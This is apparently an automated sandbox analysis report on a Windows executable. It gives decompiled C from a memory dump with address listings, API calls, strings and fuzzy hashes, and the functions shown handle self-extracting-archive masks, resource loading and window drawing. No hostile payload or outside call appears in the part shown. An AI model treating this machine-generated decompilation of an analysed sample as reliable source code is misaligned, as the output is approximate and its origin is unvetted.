                                          0x00402b1f
                                          0x00402b1f
                                          0x00402b24
                                          0x00402b27
                                          0x00402b2b
                                          0x00402b3a
                                          0x00402b3c
                                          0x00402be1
                                          0x00402be5
                                          0x00402bf0
                                          0x00402bf2
                                          0x00402bf7
                                          0x00402bfa
                                          0x00402c03
                                          0x00402c08
                                          0x00000000
                                          0x00402b42
                                          0x00402b4c
                                          0x00402b4f
                                          0x00402b57
                                          0x00402b5c
                                          0x00402b5e
                                          0x00402b8e
                                          0x00402b91
                                          0x00402b98
                                          0x00402b9d
                                          0x00402b9f
                                          0x00402bad
                                          0x00402bb0
                                          0x00402bb4
                                          0x00402bbe
                                          0x00402bc3
                                          0x00402bc5
                                          0x00402bd8
                                          0x00402bdb
                                          0x00000000
                                          0x00402be0
                                          0x00402bd3
                                          0x00402b6b
                                          0x00402b6b
                                          0x00402b6e
                                          0x00402b70
                                          0x00402b76
                                          0x00402b78
                                          0x00402b81
                                          0x00402b81
                                          0x00000000
                                          0x00402b78
                                          0x00402ba6
                                          0x00000000
                                          0x00402ba6
                                          0x00402b68
                                          0x00000000
                                          0x00402b68
                                          0x00402b3c
                                          0x00402abc
                                          0x00402ac1
                                          0x00402ac3
                                          0x00000000
                                          0x00000000
                                          0x00402ac5
                                          0x00402a03
                                          0x00402a06
                                          0x00000000
                                          0x00402a06
                                          0x00402a80
                                          0x00402a83
                                          0x00402a8f
                                          0x00402a92
                                          0x00402a97
                                          0x00000000
                                          0x00402a97
                                          0x00402a85
                                          0x00000000
                                          0x00402a85
                                          0x00402a63
                                          0x00402a68
                                          0x00402a6b
                                          0x00402a70
                                          0x00000000
                                          0x00402a70
                                          0x00402a01
                                          0x00000000
                                          0x00402a01
                                          0x004029f5
                                          0x00000000
                                          0x004029f5
                                          0x004029d7
                                          0x004029da
                                          0x004029df
                                          0x004029e2
                                          0x004029e7
                                          0x00000000
                                          0x0040295c
                                          0x0040295c
                                          0x00402c33
                                          0x00402c36
                                          0x00402c3b
                                          0x00402c3d
                                          0x00000000
                                          0x00402c3e
                                          0x0040295a
                                          0x00000000
                                          0x00402917
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: &@
                                          • API String ID: 0-1362318888
                                          • Opcode ID: b7fbd988b64781429b81ba310ec4e62d19a5b3305f7436989cb52ee7a0cdd989
                                          • Instruction ID: 0c2c45a1d49559d50b2892bbdf1ddf1765a092562d7aa30539bf8f0f12bc17d3
                                          • Opcode Fuzzy Hash: b7fbd988b64781429b81ba310ec4e62d19a5b3305f7436989cb52ee7a0cdd989
                                          • Instruction Fuzzy Hash: 42B16171A00205AFCB20EFA4C9889EE77B5FF48314F14452AF502BB2D1DBB89985CF59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402CB1, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E00402CB1(intOrPtr* __ecx, void* __edx, void* __eflags) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v24;
				char* _v28;
				signed int _v32;
				short _v36;
				short _v40;
				intOrPtr* _v44;
				char _v56;
				char _v68;
				char _v80;
				signed int _v88;
				char _v92;
				short _v94;
				char _v96;
				char _v104;
				signed int _t93;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr* _t104;
				signed int _t105;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed int _t119;
				char* _t132;
				intOrPtr _t147;
				void* _t175;
				signed int _t177;
				char* _t181;
				intOrPtr _t182;
				signed int _t186;
				intOrPtr _t190;
				intOrPtr _t191;

				_t175 = __edx;
				 *0x422774 =  *0x422774 & 0xfffffff7;
				_v44 = __ecx;
				_v40 = 0;
				_t93 = E00401303(0x4227b8, __eflags);
				if(_t93 != 0) {
					__eflags =  *0x4228d8 - 2;
					if( *0x4228d8 == 2) {
						L9:
						_push(0x48);
						L0041C16C();
						__eflags = _t93;
						if(_t93 == 0) {
							_v36 = 0;
						} else {
							_v36 = E004025B4(_t93);
						}
						_t181 = L"ExtractMaskInclude";
						E00402C44(_t181);
						_t132 = L"ExtractMaskExclude";
						E00402C44(_t132);
						__eflags =  *0x422774 & 0x00000020;
						_v28 = _t132;
						_v20 = _t181;
						if(( *0x422774 & 0x00000020) != 0) {
							_v28 = _t181;
							_v20 = _t132;
						}
						_t96 = E00404F59();
						__eflags = _t96;
						if(_t96 == 0) {
							E004147DF(E004147DF(_t96,  &_v104),  &_v92);
							E00414864( &_v104, _v20);
							E00414864( &_v92, 0x41dbb8);
							E0040287B( &_v104, 0x4227a0, 0,  &_v104);
							_push(_v92);
							L0041C160();
							_push(_v104);
							L0041C160();
						}
						_t97 = E0040115F(0x4227b8);
						_t177 = 4;
						_v32 = _t97;
						_t178 = _t97 * _t177 >> 0x20;
						_t98 = _t97 * _t177;
						_push( ~(0 | __eflags > 0x00000000) | _t98);
						L0041C16C();
						_t182 = 0;
						_t186 = 0;
						_v24 = _t98;
						__eflags = _v32;
						if(_v32 <= 0) {
							L39:
							_t147 = _v36;
							 *((intOrPtr*)(_t147 + 0x30)) = _v24;
							 *(_t147 + 0x34) = _t186;
							__eflags = _t186;
							if(_t186 != 0) {
								_v40 = E00402766(_t147, _t178,  *_v44);
							}
							_push(_v24);
							L0041C160();
							_t100 = _v40;
							L42:
							L43:
							return _t100;
						} else {
							do {
								_v88 = _v88 & 0;
								_t178 =  &_v96;
								_v96 = 0;
								_v94 = 0;
								_t104 =  *0x4227c0; // 0x566888
								_t105 =  *((intOrPtr*)( *_t104 + 0x18))(_t104, _t182, 3,  &_v96);
								__eflags = _t105;
								if(_t105 != 0) {
									goto L38;
								}
								__eflags = _v96 - 8;
								if(_v96 != 8) {
									goto L38;
								}
								E00414803( &_v56, _v88);
								_v16 = _v16 & 0x00000000;
								_t40 =  &_v12;
								 *_t40 = _v12 & 0x00000000;
								__eflags =  *_t40;
								do {
									_t178 =  &_v12;
									_t108 = E00404F59();
									__eflags = _t108;
									if(_t108 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									E00414803( &_v68, _t108);
									_t178 =  &_v56;
									_t118 = E00414C8A( &_v68,  &_v56);
									_push(_v68);
									__eflags = _t118;
									_v5 = _t118 != 0;
									L0041C160();
									__eflags = _v5;
									if(_v5 != 0) {
										_t178 = _v28;
										_t119 = E00402510(_t182, _v28);
										__eflags = _t119;
										if(_t119 != 0) {
											 *((intOrPtr*)(_v24 + _t186 * 4)) = _t182;
											_t186 = _t186 + 1;
											__eflags = _t186;
										}
										_v16 = 1;
									}
									__eflags = _v16;
								} while (_v16 == 0);
								_v12 = _v12 & 0x00000000;
								__eflags = _v16;
								if(_v16 != 0) {
									L37:
									_push(_v56);
									L0041C160();
									goto L38;
								} else {
									goto L27;
								}
								do {
									L27:
									_t178 =  &_v12;
									_t109 = E00404F59();
									__eflags = _t109;
									if(_t109 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									E00414803( &_v80, _t109);
									_t178 =  &_v56;
									_t114 = E00414C8A( &_v80,  &_v56);
									_push(_v80);
									__eflags = _t114;
									L0041C160();
									__eflags = _t132 & 0xffffff00 | _t114 != 0x00000000;
									if((_t132 & 0xffffff00 | _t114 != 0x00000000) != 0) {
										_t178 = _v20;
										_t115 = E00402510(_t182, _v20);
										__eflags = _t115;
										if(_t115 != 0) {
											 *((intOrPtr*)(_v24 + _t186 * 4)) = _t182;
											_t186 = _t186 + 1;
											__eflags = _t186;
										}
										_v16 = 1;
									}
									__eflags = _v16;
									_t132 = L"ExtractMaskExclude";
								} while (_v16 == 0);
								__eflags = _v16;
								if(_v16 == 0) {
									_t178 = _t132;
									_t110 = E0041422F(_t132);
									__eflags = _t110;
									if(_t110 == 0) {
										_t178 = L"ExtractMaskInclude";
										_t111 = E00402510(_t182, L"ExtractMaskInclude");
										__eflags = _t111;
										if(_t111 != 0) {
											 *((intOrPtr*)(_v24 + _t186 * 4)) = _t182;
											_t186 = _t186 + 1;
											__eflags = _t186;
										}
									}
								}
								goto L37;
								L38:
								E00414129( &_v96);
								_t182 = _t182 + 1;
								__eflags = _t182 - _v32;
							} while (_t182 < _v32);
							goto L39;
						}
					}
					_t93 = E0040468A( *__ecx, _t175);
					__eflags = _t93;
					if(_t93 != 0) {
						goto L9;
					} else {
						_t100 = 0x80004005;
						goto L43;
					}
				}
				_t190 =  *0x422700; // 0x0
				if(_t190 != 0) {
					L4:
					_push(0x13);
					L5:
					_pop(_t128);
					_push(0);
					E00409684(_t175);
					_t100 = 0x80004005;
					goto L42;
				}
				_t191 =  *0x422704; // 0x0
				if(_t191 != 0) {
					goto L4;
				} else {
					_push(8);
					goto L5;
				}
			}













































                                          0x00402cb1
                                          0x00402cb7
                                          0x00402ccc
                                          0x00402ccf
                                          0x00402cd2
                                          0x00402cd9
                                          0x00402d04
                                          0x00402d0b
                                          0x00402d22
                                          0x00402d22
                                          0x00402d24
                                          0x00402d2a
                                          0x00402d2c
                                          0x00402d3a
                                          0x00402d2e
                                          0x00402d35
                                          0x00402d35
                                          0x00402d3d
                                          0x00402d44
                                          0x00402d49
                                          0x00402d50
                                          0x00402d55
                                          0x00402d5c
                                          0x00402d5f
                                          0x00402d62
                                          0x00402d64
                                          0x00402d67
                                          0x00402d67
                                          0x00402d6f
                                          0x00402d74
                                          0x00402d76
                                          0x00402d83
                                          0x00402d8e
                                          0x00402d9b
                                          0x00402da9
                                          0x00402dae
                                          0x00402db1
                                          0x00402db6
                                          0x00402db9
                                          0x00402dbf
                                          0x00402dc2
                                          0x00402dcb
                                          0x00402dcc
                                          0x00402dcf
                                          0x00402dcf
                                          0x00402dd8
                                          0x00402dd9
                                          0x00402dde
                                          0x00402de0
                                          0x00402de3
                                          0x00402de6
                                          0x00402de9
                                          0x00402f44
                                          0x00402f44
                                          0x00402f4a
                                          0x00402f4d
                                          0x00402f50
                                          0x00402f52
                                          0x00402f5e
                                          0x00402f5e
                                          0x00402f61
                                          0x00402f64
                                          0x00402f69
                                          0x00402f6c
                                          0x00402f6d
                                          0x00402f71
                                          0x00402def
                                          0x00402def
                                          0x00402df1
                                          0x00402df4
                                          0x00402dfa
                                          0x00402dfe
                                          0x00402e02
                                          0x00402e0b
                                          0x00402e0e
                                          0x00402e10
                                          0x00000000
                                          0x00000000
                                          0x00402e16
                                          0x00402e1b
                                          0x00000000
                                          0x00000000
                                          0x00402e27
                                          0x00402e2c
                                          0x00402e30
                                          0x00402e30
                                          0x00402e30
                                          0x00402e34
                                          0x00402e37
                                          0x00402e3a
                                          0x00402e3f
                                          0x00402e41
                                          0x00000000
                                          0x00000000
                                          0x00402e43
                                          0x00402e4a
                                          0x00402e4f
                                          0x00402e55
                                          0x00402e5a
                                          0x00402e5d
                                          0x00402e5f
                                          0x00402e63
                                          0x00402e68
                                          0x00402e6d
                                          0x00402e6f
                                          0x00402e74
                                          0x00402e79
                                          0x00402e7b
                                          0x00402e80
                                          0x00402e83
                                          0x00402e83
                                          0x00402e83
                                          0x00402e84
                                          0x00402e84
                                          0x00402e8b
                                          0x00402e8b
                                          0x00402e91
                                          0x00402e95
                                          0x00402e99
                                          0x00402f29
                                          0x00402f29
                                          0x00402f2c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402e9f
                                          0x00402e9f
                                          0x00402ea2
                                          0x00402ea5
                                          0x00402eaa
                                          0x00402eac
                                          0x00000000
                                          0x00000000
                                          0x00402eae
                                          0x00402eb5
                                          0x00402eba
                                          0x00402ec0
                                          0x00402ec5
                                          0x00402ec8
                                          0x00402ecd
                                          0x00402ed3
                                          0x00402ed5
                                          0x00402ed7
                                          0x00402edc
                                          0x00402ee1
                                          0x00402ee3
                                          0x00402ee8
                                          0x00402eeb
                                          0x00402eeb
                                          0x00402eeb
                                          0x00402eec
                                          0x00402eec
                                          0x00402ef3
                                          0x00402ef7
                                          0x00402ef7
                                          0x00402efe
                                          0x00402f02
                                          0x00402f07
                                          0x00402f09
                                          0x00402f0e
                                          0x00402f10
                                          0x00402f12
                                          0x00402f19
                                          0x00402f1e
                                          0x00402f20
                                          0x00402f25
                                          0x00402f28
                                          0x00402f28
                                          0x00402f28
                                          0x00402f20
                                          0x00402f10
                                          0x00000000
                                          0x00402f32
                                          0x00402f35
                                          0x00402f3a
                                          0x00402f3b
                                          0x00402f3b
                                          0x00000000
                                          0x00402def
                                          0x00402de9
                                          0x00402d0f
                                          0x00402d14
                                          0x00402d16
                                          0x00000000
                                          0x00402d18
                                          0x00402d18
                                          0x00000000
                                          0x00402d18
                                          0x00402d16
                                          0x00402cdb
                                          0x00402ce1
                                          0x00402cef
                                          0x00402cef
                                          0x00402cf1
                                          0x00402cf1
                                          0x00402cf3
                                          0x00402cf4
                                          0x00402cfa
                                          0x00000000
                                          0x00402cfa
                                          0x00402ce3
                                          0x00402ce9
                                          0x00000000
                                          0x00402ceb
                                          0x00402ceb
                                          0x00000000
                                          0x00402ceb

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@
                                          • String ID: ExtractMaskExclude$ExtractMaskInclude$PreExtract$XhV
                                          • API String ID: 4113381792-4230315232
                                          • Opcode ID: 10eb3727ea93df6e32f576921567b2ccb6fee07b98c577a5f382be01ac321567
                                          • Instruction ID: d17b0469287da104a56fb6e9b72567ba4b72c6d001a8acf4ea1ba453b7e2a31c
                                          • Opcode Fuzzy Hash: 10eb3727ea93df6e32f576921567b2ccb6fee07b98c577a5f382be01ac321567
                                          • Instruction Fuzzy Hash: D4815E70E0021AABDF14EBA5DA556EEB7B1AF84314F10403FE405B72D1DBB88D86DB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403908, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 82libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E00403908(CHAR* __ecx, CHAR* __edx, intOrPtr* _a4) {
				struct HINSTANCE__* _v8;
				CHAR* _v12;
				CHAR* _v16;
				short _v80;
				struct HINSTANCE__* _t14;
				void* _t16;
				struct HRSRC__* _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr* _t35;

				_v12 = __edx;
				_v16 = __ecx;
				_t14 = GetModuleHandleW(0);
				_v8 = _t14;
				_t28 = FindResourceExA(_t14, _v16, _v12,  *0x422730 & 0x0000ffff);
				if(_t28 != 0) {
					L2:
					_t35 = _a4;
					if(_t35 != 0) {
						 *_t35 = SizeofResource(_v8, _t28);
					}
					_t16 = LoadResource(_v8, _t28);
					if(_t16 == 0) {
						L6:
						if( *0x422734 != 0) {
							L10:
							return 0;
						}
						 *0x422734 = 1;
						_t29 = GetProcAddress( *0x42275c, "SetProcessPreferredUILanguages");
						wsprintfW( &_v80, L"%04X%c%04X%c",  *0x422730 & 0x0000ffff, 0, 0x409, 0);
						if(_t29 != 0) {
							L9:
							 *_t29(4,  &_v80, 0);
							goto L10;
						}
						_t29 = GetProcAddress( *0x42275c, "SetThreadPreferredUILanguages");
						if(_t29 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						return LockResource(_t16);
					}
				}
				_t28 = FindResourceExA(_v8, _v16, _v12, 0x409);
				if(_t28 == 0) {
					goto L6;
				}
				goto L2;
			}












                                          0x00403913
                                          0x00403916
                                          0x00403919
                                          0x00403930
                                          0x00403939
                                          0x00403942
                                          0x00403956
                                          0x00403956
                                          0x0040395b
                                          0x00403967
                                          0x00403967
                                          0x0040396d
                                          0x00403975
                                          0x00403980
                                          0x00403987
                                          0x004039e8
                                          0x00000000
                                          0x004039e8
                                          0x0040399a
                                          0x004039a8
                                          0x004039be
                                          0x004039c9
                                          0x004039de
                                          0x004039e6
                                          0x00000000
                                          0x004039e6
                                          0x004039d8
                                          0x004039dc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403977
                                          0x00000000
                                          0x00403978
                                          0x00403975
                                          0x00403950
                                          0x00403954
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403919
                                          • FindResourceExA.KERNEL32(00000000,?,?), ref: 00403937
                                          • FindResourceExA.KERNEL32(?,?,?,00000409), ref: 0040394E
                                          • SizeofResource.KERNEL32(?,00000000), ref: 00403961
                                          • LoadResource.KERNEL32(?,00000000), ref: 0040396D
                                          • LockResource.KERNEL32(00000000), ref: 00403978
                                          • GetProcAddress.KERNEL32(SetProcessPreferredUILanguages), ref: 004039A4
                                          • wsprintfW.USER32 ref: 004039BE
                                          • GetProcAddress.KERNEL32(SetThreadPreferredUILanguages), ref: 004039D6
                                          Strings
                                          • %04X%c%04X%c, xrefs: 004039B8
                                          • SetProcessPreferredUILanguages, xrefs: 0040398F
                                          • SetThreadPreferredUILanguages, xrefs: 004039CB
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Resource$AddressFindProc$HandleLoadLockModuleSizeofwsprintf
                                          • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages
                                          • API String ID: 2090077119-3413765421
                                          • Opcode ID: 9ff9c65ee6ad474d1f94e696075432f17a425964b421737aef398b4ac16ad6db
                                          • Instruction ID: fb6bf53818f6b5e578f497660123dac7438a07a30edb6be36b630e0bf9700e61
                                          • Opcode Fuzzy Hash: 9ff9c65ee6ad474d1f94e696075432f17a425964b421737aef398b4ac16ad6db
                                          • Instruction Fuzzy Hash: 68212FB1E00215BBDB105FA59D45B9FBFBCEB48701F104076EA00B22A0D7F59D51DB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004189CE, Relevance: 18.0, APIs: 12, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E004189CE(void* __ecx) {
				void* _t24;

				_push( *((intOrPtr*)(__ecx + 0xd8)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xd0)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xc4)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xb8)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xac)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xa0)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x94)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x88)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x7c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x70)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x64)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x58)));
				L0041C160();
				_pop(_t30);
				_push( *((intOrPtr*)(__ecx + 0x4c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x3c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x38)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x34)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x30)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x2c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x24)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x18)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xc)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 8)));
				L0041C160();
				return _t24;
			}




                                          0x004189d2
                                          0x004189d8
                                          0x004189dd
                                          0x004189e3
                                          0x004189e8
                                          0x004189ee
                                          0x004189f3
                                          0x004189f9
                                          0x004189fe
                                          0x00418a04
                                          0x00418a09
                                          0x00418a0f
                                          0x00418a14
                                          0x00418a1a
                                          0x00418a1f
                                          0x00418a25
                                          0x00418a2a
                                          0x00418a2d
                                          0x00418a32
                                          0x00418a35
                                          0x00418a3a
                                          0x00418a3d
                                          0x00418a42
                                          0x00418a45
                                          0x00418a50
                                          0x004185d4
                                          0x004185d7
                                          0x004185dc
                                          0x004185df
                                          0x004185e4
                                          0x004185e7
                                          0x004185ec
                                          0x004185ef
                                          0x004185f4
                                          0x004185f7
                                          0x004185fc
                                          0x004185ff
                                          0x00418604
                                          0x00418607
                                          0x0041860c
                                          0x0041860f
                                          0x00418614
                                          0x00418617
                                          0x0041861c
                                          0x0041861f
                                          0x00418624
                                          0x00418627
                                          0x00418630

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 463c73ceaa07c935f3af9de3e480d10ad52c6e6ab7b396599fa03f1166ecd5dd
                                          • Instruction ID: 0e0f50dce1b9974b6fb96937f2ede7be7b7889254afb23eb482ec8a91eb4f058
                                          • Opcode Fuzzy Hash: 463c73ceaa07c935f3af9de3e480d10ad52c6e6ab7b396599fa03f1166ecd5dd
                                          • Instruction Fuzzy Hash: A3F068382D0B24BAD6223732DC42BDBB6B6AF40B08F00442FB19A604338DA57C919F5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040808C, Relevance: 16.6, APIs: 11, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0040808C(void* __edx, long _a4, int _a8, int _a12, int _a16) {
				struct tagRECT _v20;
				_Unknown_base(*)()* _t29;
				int _t34;
				struct HWND__* _t55;
				void* _t56;
				long _t57;
				struct HDC__* _t61;

				_t56 = __edx;
				_t55 = _a4;
				_t57 = GetWindowLongW(GetParent(_t55), 0xffffffeb);
				if(_t57 != 0) {
					_t29 =  *(_t57 + 0x54);
					_a4 = _a4 & 0x00000000;
					if(_t29 != 0) {
						_a4 = CallWindowProcW(_t29, _t55, _a8, _a12, _a16);
					}
					_a12 = GetSystemMetrics(0x31);
					_a16 = GetSystemMetrics(0x32);
					_t34 = _a8;
					if(_t34 == 0) {
						SetWindowLongW(_t55, 0xfffffffc,  *(_t57 + 0x54));
					} else {
						if(_t34 == 0xd) {
							_t61 = GetWindowDC(_t55);
							GetWindowRect(_t55,  &_v20);
							asm("cdq");
							asm("cdq");
							DrawIconEx(_t61, _v20.right - _v20.left - _a12 - _t56 >> 1, _v20.bottom - _v20.top - _a16 - _t56 >> 1,  *(_t57 + 0x50), _a12, _a16, 0, 0, 3);
							ReleaseDC(_t55, _t61);
						}
					}
					return _a4;
				}
				return DefWindowProcW(_t55, _a8, _a12, _a16);
			}










                                          0x0040808c
                                          0x00408093
                                          0x004080a7
                                          0x004080ab
                                          0x004080c2
                                          0x004080c5
                                          0x004080cb
                                          0x004080de
                                          0x004080de
                                          0x004080ee
                                          0x004080f3
                                          0x004080fa
                                          0x004080fb
                                          0x0040815a
                                          0x004080fd
                                          0x00408100
                                          0x00408109
                                          0x00408110
                                          0x00408128
                                          0x0040813d
                                          0x00408144
                                          0x0040814c
                                          0x0040814c
                                          0x00408100
                                          0x00000000
                                          0x00408163
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                          • String ID:
                                          • API String ID: 2586545124-0
                                          • Opcode ID: 58eddb4fd1200f8cdab970e24eaff4f37387fe116eb04ae65f16346c54bda7fc
                                          • Instruction ID: 5863647e7012f7e332d139e9621e2b3ca0e85c148ed14a4dd9622dae80b8943e
                                          • Opcode Fuzzy Hash: 58eddb4fd1200f8cdab970e24eaff4f37387fe116eb04ae65f16346c54bda7fc
                                          • Instruction Fuzzy Hash: A6310CB690060ABFDB019FB8DE48EDF3B69FB08351F008525FA51E6190CB74D920CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004094E2, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 73windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004094E2(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				int _v20;
				int _v24;
				intOrPtr _v32;
				char _v40;
				void* _t44;

				_t44 = __ecx;
				E00409190(__ecx, __edx, __eflags);
				E004079B7(_t44, 0x4b7, 0);
				E00407925(_t44, 0x4b7,  &_v40);
				E00407925(_t44, 0x4b7,  &_v24);
				DestroyWindow(GetDlgItem( *(_t44 + 4), 0x4b7));
				CreateWindowExA(0x200, "Edit", 0x41de2a, 0x500100a0, _v24, _v20, _v32 - _v24, _v12 - _v20,  *(_t44 + 4), 0x4b7, 0, 0);
				_v8 = SendMessageW( *(_t44 + 4), 0x31, 0, 0);
				SendMessageW(GetDlgItem( *(_t44 + 4), 0x4b7), 0x30, _v8, 1);
				SetFocus(GetDlgItem( *(_t44 + 4), 0x4b6));
				return 0;
			}










                                          0x004094eb
                                          0x004094ed
                                          0x004094fc
                                          0x00409508
                                          0x00409515
                                          0x00409527
                                          0x0040955d
                                          0x00409577
                                          0x00409584
                                          0x00409591
                                          0x0040959d

                                          APIs
                                            • Part of subcall function 00409190: memset.MSVCRT ref: 004091E2
                                            • Part of subcall function 00409190: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091F6
                                            • Part of subcall function 00409190: SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 00409216
                                            • Part of subcall function 00409190: GetDlgItem.USER32 ref: 00409229
                                            • Part of subcall function 00409190: SetWindowLongW.USER32 ref: 00409237
                                            • Part of subcall function 004079B7: GetDlgItem.USER32 ref: 004079C4
                                            • Part of subcall function 004079B7: ShowWindow.USER32(00000000,?), ref: 004079DB
                                            • Part of subcall function 00407925: GetDlgItem.USER32 ref: 0040792D
                                          • GetDlgItem.USER32 ref: 00409524
                                          • DestroyWindow.USER32(00000000), ref: 00409527
                                          • CreateWindowExA.USER32 ref: 0040955D
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040956D
                                          • GetDlgItem.USER32 ref: 0040957A
                                          • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 00409584
                                          • GetDlgItem.USER32 ref: 0040958E
                                          • SetFocus.USER32(00000000), ref: 00409591
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystemmemset
                                          • String ID: Edit
                                          • API String ID: 1904772019-554135844
                                          • Opcode ID: fa5d6b11f3bfb7040f8905d8716a38a91aa73369538ddbddf177dea4798fc51b
                                          • Instruction ID: 0e6a47c8423b62f02d93f4ef7a6912530f49f9b8c415eb71875aef5ea39149c2
                                          • Opcode Fuzzy Hash: fa5d6b11f3bfb7040f8905d8716a38a91aa73369538ddbddf177dea4798fc51b
                                          • Instruction Fuzzy Hash: 17112475E00318BBEB11ABE5CD49FAFBBBDEF89B04F104419B611B6190C675ED008729
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004099C9, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123COMMON
